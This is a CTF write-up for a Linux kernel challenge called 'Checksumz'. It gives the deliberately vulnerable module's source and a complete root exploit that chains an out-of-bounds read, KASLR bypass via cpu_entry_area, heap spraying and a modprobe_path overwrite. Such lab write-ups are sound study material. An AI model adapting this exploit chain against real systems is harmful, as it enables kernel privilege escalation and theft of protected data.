Checksumz
Someone told me that I can write faster programs by putting them into kernel modules, so I replaced my checksum function with a char device.
This is a kernel challenge. We are given a vulnerable module, and we have to get root permissions to get the flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
// SPDX-License-Identifier: GPL-2.0-or-later
/*
* This kernel module has serious security issues (and probably some implementation
* issues), and might crash your kernel at any time. Please don't load this on any
* system that you actually care about. I recommend using a virtual machine for this.
* You have been warned.
*/
#define DEVICE_NAME "checksumz"
#define pr_fmt(fmt) DEVICE_NAME ": " fmt
#include <linux/cdev.h>
#include <linux/fs.h>
#include <linux/module.h>
#include <linux/uio.h>
#include <linux/version.h>
#include "api.h"
static void adler32(const void *buf, size_t len, uint32_t* s1, uint32_t* s2) {
const uint8_t *buffer = (const uint8_t*)buf;
for (size_t n = 0; n < len; n++) {
*s1 = (*s1 + buffer[n]) % 65521;
*s2 = (*s2 + *s1) % 65521;
}
}
/* ***************************** DEVICE OPERATIONS ***************************** */
static loff_t checksumz_llseek(struct file *file, loff_t offset, int whence) {
struct checksum_buffer* buffer = file->private_data;
switch (whence) {
case SEEK_SET:
buffer->pos = offset;
break;
case SEEK_CUR:
buffer->pos += offset;
break;
case SEEK_END:
buffer->pos = buffer->size - offset;
break;
default:
return -EINVAL;
}
if (buffer->pos < 0)
buffer->pos = 0;
if (buffer->pos >= buffer->size)
buffer->pos = buffer->size - 1;
return buffer->pos;
}
static ssize_t checksumz_write_iter(struct kiocb *iocb, struct iov_iter *from) {
struct checksum_buffer* buffer = iocb->ki_filp->private_data;
size_t bytes = iov_iter_count(from);
if (!buffer)
return -EBADFD;
if (!bytes)
return 0;
ssize_t copied = copy_from_iter(buffer->state + buffer->pos, min(bytes, 16), from);
buffer->pos += copied;
if (buffer->pos >= buffer->size)
buffer->pos = buffer->size - 1;
return copied;
}
static ssize_t checksumz_read_iter(struct kiocb *iocb, struct iov_iter *to) {
struct checksum_buffer* buffer = iocb->ki_filp->private_data;
size_t bytes = iov_iter_count(to);
if (!buffer)
return -EBADFD;
if (!bytes)
return 0;
if (buffer->read >= buffer->size) {
buffer->read = 0;
return 0;
}
ssize_t copied = copy_to_iter(buffer->state + buffer->pos, min(bytes, 256), to);
buffer->read += copied;
buffer->pos += copied;
if (buffer->pos >= buffer->size)
buffer->pos = buffer->size - 1;
return copied;
}
static long checksumz_ioctl(struct file *file, unsigned int command, unsigned long arg) {
struct checksum_buffer* buffer = file->private_data;
if (!file->private_data)
return -EBADFD;
switch (command) {
case CHECKSUMZ_IOCTL_RESIZE:
if (arg <= buffer->size && arg > 0) {
buffer->size = arg;
buffer->pos = 0;
} else
return -EINVAL;
return 0;
case CHECKSUMZ_IOCTL_RENAME:
char __user *user_name_buf = (char __user*) arg;
if (copy_from_user(buffer->name, user_name_buf, 48)) {
return -EFAULT;
}
return 0;
case CHECKSUMZ_IOCTL_PROCESS:
adler32(buffer->state, buffer->size, &buffer->s1, &buffer->s2);
memset(buffer->state, 0, buffer->size);
return 0;
case CHECKSUMZ_IOCTL_DIGEST:
uint32_t __user *user_digest_buf = (uint32_t __user*) arg;
uint32_t digest = buffer->s1 | (buffer->s2 << 16);
if (copy_to_user(user_digest_buf, &digest, sizeof(uint32_t))) {
return -EFAULT;
}
return 0;
default:
return -EINVAL;
}
return 0;
}
/* This is the counterpart to open() */
static int checksumz_open(struct inode *inode, struct file *file) {
file->private_data = kzalloc(sizeof(struct checksum_buffer), GFP_KERNEL);
struct checksum_buffer* buffer = (struct checksum_buffer*) file->private_data;
buffer->pos = 0;
buffer->size = 512;
buffer->read = 0;
buffer->name = kzalloc(1000, GFP_KERNEL);
buffer->s1 = 1;
buffer->s2 = 0;
const char* def = "default";
memcpy(buffer->name, def, 8);
for (size_t i = 0; i < buffer->size; i++)
buffer->state[i] = 0;
return 0;
}
/* This is the counterpart to the final close() */
static int checksumz_release(struct inode *inode, struct file *file)
{
if (file->private_data)
kfree(file->private_data);
return 0;
}
/* All the operations supported on this file */
static const struct file_operations checksumz_fops = {
.owner = THIS_MODULE,
.open = checksumz_open,
.release = checksumz_release,
.unlocked_ioctl = checksumz_ioctl,
.write_iter = checksumz_write_iter,
.read_iter = checksumz_read_iter,
.llseek = checksumz_llseek,
};
/* ***************************** INITIALIZATION AND CLEANUP (You can mostly ignore this.) ***************************** */
static dev_t device_region_start;
static struct class *device_class;
static struct cdev device;
/* Create the device class */
#if LINUX_VERSION_CODE >= KERNEL_VERSION(6, 4, 0)
static inline struct class *checksumz_create_class(void) { return class_create(DEVICE_NAME); }
#else
static inline struct class *checksumz_create_class(void) { return class_create(THIS_MODULE, DEVICE_NAME); }
#endif
/* Make the device file accessible to normal users (rw-rw-rw-) */
#if LINUX_VERSION_CODE >= KERNEL_VERSION(6, 2, 0)
static char *device_node(const struct device *dev, umode_t *mode) { if (mode) *mode = 0666; return NULL; }
#else
static char *device_node(struct device *dev, umode_t *mode) { if (mode) *mode = 0666; return NULL; }
#endif
/* Create the device when the module is loaded */
static int __init checksumz_init(void)
{
int err;
if ((err = alloc_chrdev_region(&device_region_start, 0, 1, DEVICE_NAME)))
return err;
err = -ENODEV;
if (!(device_class = checksumz_create_class()))
goto cleanup_region;
device_class->devnode = device_node;
if (!device_create(device_class, NULL, device_region_start, NULL, DEVICE_NAME))
goto cleanup_class;
cdev_init(&device, &checksumz_fops);
if ((err = cdev_add(&device, device_region_start, 1)))
goto cleanup_device;
return 0;
cleanup_device:
device_destroy(device_class, device_region_start);
cleanup_class:
class_destroy(device_class);
cleanup_region:
unregister_chrdev_region(device_region_start, 1);
return err;
}
/* Destroy the device on exit */
static void __exit checksumz_exit(void)
{
cdev_del(&device);
device_destroy(device_class, device_region_start);
class_destroy(device_class);
unregister_chrdev_region(device_region_start, 1);
}
module_init(checksumz_init);
module_exit(checksumz_exit);
/* Metadata that the kernel really wants */
MODULE_DESCRIPTION("/dev/" DEVICE_NAME ": a vulnerable kernel module");
MODULE_AUTHOR("LambdaXCF <hello@lambda.blog>");
MODULE_LICENSE("GPL");
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#ifndef CHECKSUMZ_API_H
#define CHECKSUMZ_API_H
/* You may want to include this from userspace code, since this describes the valid ioctls */
#ifdef __KERNEL__
#include <linux/types.h>
#include <linux/ioctl.h>
#else /* !__KERNEL__ */
#include <stddef.h>
#include <sys/ioctl.h>
#include <stdint.h>
#define __user /* __user means nothing in userspace, since everything is a user pointer anyways */
#endif
struct checksum_buffer {
loff_t pos;
char state[512];
size_t size;
size_t read;
char* name;
uint32_t s1;
uint32_t s2;
};
#define CHECKSUMZ_IOCTL_RENAME _IOWR('@', 0, char*)
#define CHECKSUMZ_IOCTL_PROCESS _IO('@', 1)
#define CHECKSUMZ_IOCTL_RESIZE _IOWR('@', 2, uint32_t)
#define CHECKSUMZ_IOCTL_DIGEST _IOWR('@', 3, uint32_t*)
#endif /* SONGBIRD_API_H */
We have to read /dev/vda
to get the flag.
Whenever the char device is opened, it calls checksumz_open
, which allocates a structure of type checksum_buffer
. Using the file descriptor, we can read from or write into the buffer. There are also some IOCTL handlers. The challenge has kaslr
enabled, so we need a leak first.
Let’s look at the read function first. Even though it checks buffer->read >= buffer->size
and we can read maximum 256 bytes, the check is wrongly implemented. It doesn’t take into account the number of bytes we are trying to read. So, if buffer->read
is 500, and buffer->size
is 512, we can still read 256 bytes and achieve out-of-bounds read.
We can get a heap leak by leaking the ->name
field of the checksum_buffer
, which is returned by kzalloc
. buffer->size
is 512, so we can set buffer->pos
to 511 to be able to read again without triggering the if
check. We have 1 char left from the ->state
, then 2 qwords (->size
and ->read
) and then the heap leak, ->name
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
size_t leak_heap(int fd) {
// set buf->pos to 511
{
{
char buf[256] = { 0 };
read(fd, buf, sizeof buf);
}
{
char buf[255] = { 0 };
read(fd, buf, sizeof buf);
}
}
// now that we can read out of bounds, read the
// buffer structure
{
struct {
char __padding;
size_t size;
size_t read;
char* name;
} __attribute__((packed)) buf;
read(fd, &buf, sizeof buf);
return (size_t)buf.name;
}
}
Now that we have a heap leak, we need a kernel address leak. We can use the cpu_entry_area
trick, which is an address containing kernel pointers, not affected by kaslr
, at address 0xfffffe0000000000
.
We can see that starting at address 0xfffffe0000000004
we have some kernel pointers. But first, we need to transform the read primitive into a more powerful one.
We have the checksumz_llseek
function, which is called when the user calls lseek
on the file descriptor. However, we are limited by the ->size
field of the buffer.
The write function doesn’t even implement a bounds check, but we can write 16 bytes at most. We can use the read function to advance the ->pos
field once again to 511, and use the write function to overwrite the following 16 bytes, which consist of 1 byte left from ->state
, the full ->size
field and 7 out of 8 bytes of the ->read
field. If we set the ->size
field to 0xffffffffffffffff
, we can set ->pos
to anything we want, then use the read function to achieve an arbitrary read primitive.
However, the read function uses buffer->state
as the starting point. Due to kaslr
, we do not know where that is. Even if we achieved a heap leak, we cannot reliably compute the address of the buffer structure, since ->name
is allocated separately. We can do a heap spray by allocating large amounts of checksum_buffer
s (by calling open
on the char device) and choose a random offset from the heap leak (say, -0x400
). Then, for each new file descriptor created, try to read the cpu_entry_area
, assuming that the address of the buffer is the computed address with the offset. One of the descriptors will most probably be allocated at that offset. I found that this technique is pretty reliable, and only failed 2 or 3 times out of tens of runs.
We know a kernel address when we see one: it starts with 0xFFFFFFFF
. Also, after subtracting the offset of the leak, the result (kernel base) should end in five zeroes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
int fds[FD_COUNT] = { 0 };
for (int i = 0; i < ARRAY_SIZE(fds); i += 1) {
fds[i] = open(TARGET, O_RDWR);
}
size_t heap_leak = leak_heap(fds[0]);
printf("Heap leak: %p\n", heap_leak);
size_t current_buffer = heap_leak - 0x400;
printf("Current buffer: %p\n", current_buffer);
size_t kernel_base = 0;
// spray pages to find which one contains the desired offset
for (int i = 0; i < ARRAY_SIZE(fds); i += 1) {
int fd = fds[i];
size_t kernel_leak = try_read_kernel(fd, current_buffer, i != 0);
// kernel base has higher dword filled with 1s
if (kernel_leak >> 32 != 0xFFFFFFFF || kernel_leak == 0xFFFFFFFFFFFFFFFF) {
continue;
}
printf("Kernel leak: %p\n", kernel_leak);
kernel_base = kernel_leak - 0x1008e00;
// kernel base has lower bytes 0
if (kernel_base & 0xfffff != 0) {
continue;
}
printf("Kernel base: %p\n", kernel_base);
break;
}
if (kernel_base == 0) {
printf("Kernel base not found... try again\n");
return -1;
}
try_read_kernel
uses the read, write and seek functions to achieve what was explained above:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
size_t try_read_kernel(int fd, size_t current_buffer, int adjust_initial_pos) {
if (adjust_initial_pos) {
// set buffer->pos to 511
for (int i = 0; i < 2; i += 1) {
char buf[256] = { 0 };
read(fd, buf, sizeof buf);
}
}
// set size to a large value so we can freely control
// buffer->pos
{
struct {
char __padding;
size_t size;
size_t read : (64 - 8);
} __attribute__((packed)) buf = {
.size = 0xffffffffffffffff,
.read = 0,
};
write(fd, &buf, sizeof buf);
}
// set buffer->pos such that we can read the cpu_entry_area
{
lseek(fd, cpu_entry_area - current_buffer - 8, SEEK_SET);
}
// read the leak
{
char buf[16] = { 0 };
read(fd, buf, sizeof buf);
return *(size_t *)buf;
}
}
Now that we have a kernel leak, we can proceed with the exploit. The easiest way is to overwrite modprobe_path
, which is a string in memory defining the path to a program that will be called (with root privileges) when the user tries to execute a file with an unknown magic header. The path is stored in a writable page, and since we have the kernel base, we can compute its address. But we still need an arbitrary write. We can go with a similar technique for leaking the kernel address, by using the sprayed buffers, but we have a more reliable way through ioctl
calls. We have an ioctl
code for renaming the buffer, which writes whatever we want into the buffer pointed at by the ->name
field. We can use a file descriptor, set its ->pos
to the offset of ->name
, write the address of modprobe_path
and call the ioctl
handler to overwrite modprobe_path
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
size_t modprobe_path = kernel_base + modprobe_path_offset;
printf("modprobe_path: %p\n", modprobe_path);
// point buffer->pos so we can write in buffer->name
lseek(fds[0], 512 + 16, SEEK_SET);
// write modprobe_path in buffer->name
write(fds[0], &modprobe_path, sizeof modprobe_path);
prepare_modprobe_files();
// write to modprobe_path
ioctl(fds[0], CHECKSUMZ_IOCTL_RENAME, EXPLOIT_SH);
// execute invalid file that will trigger modprobe_path
system(TRIGGER_SH);
But we also have to prepare the files needed for the modprobe_path
exploit. We need a file with an invalid magic header, and a file that will actually do the exploit. The path of the second file will be written into modprobe_path
, while the first one will just be executed to trigger the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void prepare_modprobe_files() {
{
int fd = open(EXPLOIT_SH, O_CREAT | O_WRONLY);
char buf[] = "#!/bin/sh\ntouch /tmp/pwned\ncat /dev/vda > /tmp/flag\nchmod 777 /tmp/flag\n";
write(fd, buf, sizeof buf);
fchmod(fd, 0777);
close(fd);
}
{
int fd = open(TRIGGER_SH, O_CREAT | O_WRONLY);
char buf[] = "\xff\xff\xff\xff";
write(fd, buf, sizeof buf);
fchmod(fd, 0777);
close(fd);
}
}
After executing the exploit, we now have a file called pwned
and a copy of the flag.
Final exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#include "api.h"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <sys/stat.h>
#define TARGET "/dev/checksumz"
#define ARRAY_SIZE(array) (sizeof(array) / sizeof(array[0]))
#define FD_COUNT 1000
#define EXPLOIT_SH "/tmp/exploit.sh"
#define TRIGGER_SH "/tmp/trigger.sh"
const size_t cpu_entry_area = 0xfffffe0000000004;
const size_t modprobe_path_offset = 0x1b3f100;
size_t leak_heap(int fd) {
// set buf->pos to 511
{
{
char buf[256] = { 0 };
read(fd, buf, sizeof buf);
}
{
char buf[255] = { 0 };
read(fd, buf, sizeof buf);
}
}
// now that we can read out of bounds, read the
// buffer structure
{
struct {
char __padding;
size_t size;
size_t read;
char* name;
} __attribute__((packed)) buf;
read(fd, &buf, sizeof buf);
return (size_t)buf.name;
}
}
size_t try_read_kernel(int fd, size_t current_buffer, int adjust_initial_pos) {
if (adjust_initial_pos) {
// set buffer->pos to 511
for (int i = 0; i < 2; i += 1) {
char buf[256] = { 0 };
read(fd, buf, sizeof buf);
}
}
// set size to a large value so we can freely control
// buffer->pos
{
struct {
char __padding;
size_t size;
size_t read : (64 - 8);
} __attribute__((packed)) buf = {
.size = 0xffffffffffffffff,
.read = 0,
};
write(fd, &buf, sizeof buf);
}
// set buffer->pos such that we can read the cpu_entry_area
{
lseek(fd, cpu_entry_area - current_buffer - 8, SEEK_SET);
}
// read the leak
{
char buf[16] = { 0 };
read(fd, buf, sizeof buf);
return *(size_t *)buf;
}
}
void prepare_modprobe_files() {
{
int fd = open(EXPLOIT_SH, O_CREAT | O_WRONLY);
char buf[] = "#!/bin/sh\ntouch /tmp/pwned\ncat /dev/vda > /tmp/flag\nchmod 777 /tmp/flag\n";
write(fd, buf, sizeof buf);
fchmod(fd, 0777);
close(fd);
}
{
int fd = open(TRIGGER_SH, O_CREAT | O_WRONLY);
char buf[] = "\xff\xff\xff\xff";
write(fd, buf, sizeof buf);
fchmod(fd, 0777);
close(fd);
}
}
int main() {
int fds[FD_COUNT] = { 0 };
for (int i = 0; i < ARRAY_SIZE(fds); i += 1) {
fds[i] = open(TARGET, O_RDWR);
}
size_t heap_leak = leak_heap(fds[0]);
printf("Heap leak: %p\n", heap_leak);
size_t current_buffer = heap_leak - 0x400;
printf("Current buffer: %p\n", current_buffer);
size_t kernel_base = 0;
// spray pages to find which one contains the desired offset
for (int i = 0; i < ARRAY_SIZE(fds); i += 1) {
int fd = fds[i];
size_t kernel_leak = try_read_kernel(fd, current_buffer, i != 0);
// kernel base has higher dword filled with 1s
if (kernel_leak >> 32 != 0xFFFFFFFF || kernel_leak == 0xFFFFFFFFFFFFFFFF) {
continue;
}
printf("Kernel leak: %p\n", kernel_leak);
kernel_base = kernel_leak - 0x1008e00;
// kernel base has lower bytes 0
if (kernel_base & 0xfffff != 0) {
continue;
}
printf("Kernel base: %p\n", kernel_base);
break;
}
if (kernel_base == 0) {
printf("Kernel base not found... try again\n");
return -1;
}
size_t modprobe_path = kernel_base + modprobe_path_offset;
printf("modprobe_path: %p\n", modprobe_path);
// point buffer->pos so we can write in buffer->name
lseek(fds[0], 512 + 16, SEEK_SET);
// write modprobe_path in buffer->name
write(fds[0], &modprobe_path, sizeof modprobe_path);
prepare_modprobe_files();
// write to modprobe_path
ioctl(fds[0], CHECKSUMZ_IOCTL_RENAME, EXPLOIT_SH);
// execute invalid file that will trigger modprobe_path
system(TRIGGER_SH);
}